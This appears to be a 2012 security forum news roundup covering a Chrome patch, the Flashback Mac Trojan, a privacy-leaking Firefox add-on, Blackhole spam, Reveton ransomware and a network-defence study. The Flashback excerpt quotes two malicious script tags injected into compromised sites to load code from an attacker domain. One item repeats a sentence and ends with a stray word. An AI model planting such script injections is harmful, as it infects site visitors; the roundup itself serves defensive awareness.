Spyware, viruses, & security forum: NEWS - May 01, 2012

Google has released a new update to the stable 18.x branch of its Chrome web browser to close a number of security holes found in the application. The update, labelled 18.0.1025.168, addresses a total of five vulnerabilities, three of which are rated as "high severity" by the company.

These include use-after-free problems in floating point handling and the XML parser; all of these bugs were detected using the AddressSanitizer. As part of its Chromium Security Vulnerability Rewards program, Google paid a security researcher by the name of "miaubiz", who is number three in the company's Security Hall of Fame, $1,000 for discovering and reporting one of the float handling problems. Two medium risk problems related to IPC validation and a race condition in sandbox IPC have also been corrected.

Further information about the update can be found in the announcement post on the Google Chrome Releases blog. Chrome 18.0.1025.168 is available to download for Windows, Mac OS X and Linux from google.com/chrome; existing users can upgrade using the built-in update function.

http://www.h-online.com/security/news/item/Chrome-18-update-closes-high-risk-security-holes-1564337.html

See Vulnerabilities & Fixes: Google Chrome Multiple Vulnerabilities

From the Symantec Security Response Blog:

We've been busy in the labs reverse engineering the various components of OSX.Flashback.K to determine the true motivation behind the malware. Let's take a look at this Mac Trojan in more detail.

The Infection
It's now well-known that the latest OSX.Flashback.K variant was being distributed using the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which was patched by Oracle in February. Unfortunately for Mac users, there was a large window of exposure since Apple's patch for this vulnerability was not available for six weeks.

This window of opportunity helped the Flashback Trojan to infect Macs on a large scale. The Flashback authors took advantage of the gap between Oracle and Apple's patches by exploiting vulnerable websites using Wordpress and Joomla to add malicious code snippets.

<script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script>
<script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>

If a user visited a compromised site on an unpatched Mac, OSX.Flashback.K would be installed. Here is a breakdown of the Flashback stages of infection:

1 - A user visits a compromised website.
2 - The browser is redirected to an exploit site hosting numerous Java exploits.
3 - CVE-2012-0507 is used to decrypt and install the initial OSX.Flashback.K component.
4 - This component downloads a loader and an Ad-clicking component.

Continued : http://www.symantec.com/connect/blogs/osxflashbackk-motivation-behind-malware

Related:
Symantec: Flashback Malware Netted Upwards of $10,000 a Day
Flashback botnet is a cash cow

A popular Firefox add-on appears to have started leaking private information about every website that users visit to a third-party server, including sensitive data which could identify individuals or reduce their security.

Naked Security reader Rob Sanders alerted us to the activities of the recently updated ShowIP add-on for the Firefox browser.

According to the description on the Mozilla add-ons website, ShowIP is designed to "show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right click) and hostname (left click), like whois, netcraft, etc. Additionally you can copy the IP address to the clipboard."

Currently over 170,000 people are said to be using ShowIP.

What the add-on's description doesn't say is that since version 1.3 (released on April 19th 2012) it has also sent - unencrypted - the full URL of sites visited using HTTPS, and sites viewed in Private Browsing mode, to a site called ip2info.org.

The user never realises that the data has been shared with a third-party, unless they use special tools to monitor what data is being sent from their computer.

Continued : http://nakedsecurity.sophos.com/2012/05/01/privacy-concern-showip-firefox-add-on/

A seemingly never-ending string of spam email campaigns leading to websites hosting the infamous Blackhole exploit kit are hitting inboxes around the world in waves.

The latest and most prominent ones consisted of the fake Facebook, LinkedIn, USPS and US Airways notifications, while the last one spotted masquerades as an email from employment website CareerBuilder.com saying that the recipient might find a job opening appealing.

As usual, the offered link takes the recipient through a number of redirections and finally lands him on a compromised site serving the exploit kit.

According to a recent analysis by Trend Micro researchers, these spam messages are mostly targeting US users, and are often very realistic spoofs of the companies' original and legitimate emails. These spam messages are mostly targeting US users, and are often very realistic spoofs of the companies' original and legitimate emails. The

"We found clear evidence that all these attacks were linked. In many cases, the same sets of compromised URLs by multiple spam runs," the researchers pointed out. "This suggests that at least some of the parties responsible for these attacks were identical, if it was not the same group altogether."

Continued : http://www.net-security.org/malware_news.php?id=2089

From the Trusteer Blog:

Trusteer Intelligence researchers have discovered a clever new use of the Citadel malware platform (a descendent of the Zeus Trojan) to deliver code ransomware that poses as the US Department of Justice and highjacks victims' computers. This ransomware, named Reveton, freezes the compromised machine's operating system and demands a $100 payment to unlock it. Reveton was observed a few weeks ago being used as a standalone attack, but has now been coupled with the Citadel platform. This is another example of financial malware expanding beyond online banking fraud and being used as a launch pad for other types of cyber-attacks. Citadel is able to target employees to steal enterprise credentials, and in this example targets victims directly to steal money from them, instead of their financial institution.

The attack begins with the victim being lured to a drive-by download website. Here a dropper installs the Citadel malware on the target machine which retrieves the ransomware DLL from its command and control server.

Once installed on the victim's computer, the ransomware locks-up the targeted machine and displays a warning message notifying the user that they have violated United States Federal Law. The web inject screen (below) claims the IP address belonging to the infected machine was identified by the Computer Crime & Intellectual Property Section as having visited websites that contain child pornography and other illegal content.

Continued : http://www.trusteer.com/blog/fake-g-men-attack-hijacks-computers-ransom

.. claim researchers

"A new system of splitting network traffic could provide advance warning of cyber attacks"

Security engineers at the University of Tulsa have found a way to identify cyber attacks before they reach their target, enabling network administrators to take pre-emptive measures to protect their IT systems.

In a report published in the International Journal of Critical Infrastructure Protection, the engineers explained that slowing traffic by just a few milliseconds can give networks time to identify malicious data packets. The team have developed an algorithm that sends high-speed signals flying ahead of the malware to mobilise defences.

"Hyperspeed signalling uses optimal (hyperspeed) paths to transmit high priority traffic while other traffic is sent along suboptimal (slower) paths," stated the report. "Slowing the traffic ever so slightly enables the faster command and control messages to implement sophisticated network defence mechanisms."

Continued : http://news.techworld.com/security/3354992/hyperspeed-signalling-could-prevent-cyber-attacks-claim-researchers/